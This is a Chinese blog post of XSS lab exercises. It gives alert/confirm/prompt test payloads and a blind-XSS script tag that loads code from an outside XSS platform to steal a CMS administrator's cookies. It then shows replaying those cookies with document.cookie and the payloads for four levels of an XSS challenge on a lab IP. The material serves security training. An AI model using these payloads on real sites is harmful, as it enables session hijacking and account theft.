Exercise:1.XSS盲打 2.XSS靶场练习

目录

1. XSS 盲打

2. XSS 挑战靶场练习


1. XSS 盲打

1) 挖掘cms 网站XSS 漏洞

XSS漏洞验证

<script>alert(/xss/);</script>  //显示警示框
<script>confirm(/xss/);</script>  //显示确认框
<script>confirm('xss');</script>
<script>prompt('xss');</script>  //显示提示框
  //<script> 元素来注入恶意脚本

如果页面弹窗,浏览器把用户提交的字符串当做JS 来执行,执行成功,说明XSS 漏洞存在。

2) 利用XSS 平台盲打网站后台管理员Cookie

  • 由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。

<sCRiPt sRC=//xss.pt/m03VUL></sCrIpT>

XSS平台 - (支持http/https)XSS Platform

 

 

username=admin;
userid=1; “PHPSESSID=na4d9ft826joec4bfdd915o3q6”;

3) Cookie 欺骗

document.cookie = 'username=admin';
​
document.cookie = 'userid=1'; 
​
document.cookie = 'PHPSESSID=na4d9ft826joec4bfdd915o3q6'; 

 

 

2. XSS 挑战靶场练习

第一关:

http://192.168.5.140/xsschallenge/level1.php?name=<script>alert(/xss/);</script>

 

第二关:

试试<script>alert(/xss/)</script>,发现输入的内容会被直接显示在页面中,这说明这段JS代码没有起作用,只是当作纯字符给输出到页面了。 右键页面查看源码:

发现尖括号都被转义成&lt和&gt

把input标签用">闭合

"><script>alert(/xss/)</script>

第三关:

单引号闭合标签+html事件

'onmouseover='alert(/xss/)'

第四关:

双引号闭合标签+html事件

"onmouseover='alert(/xss/)'
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值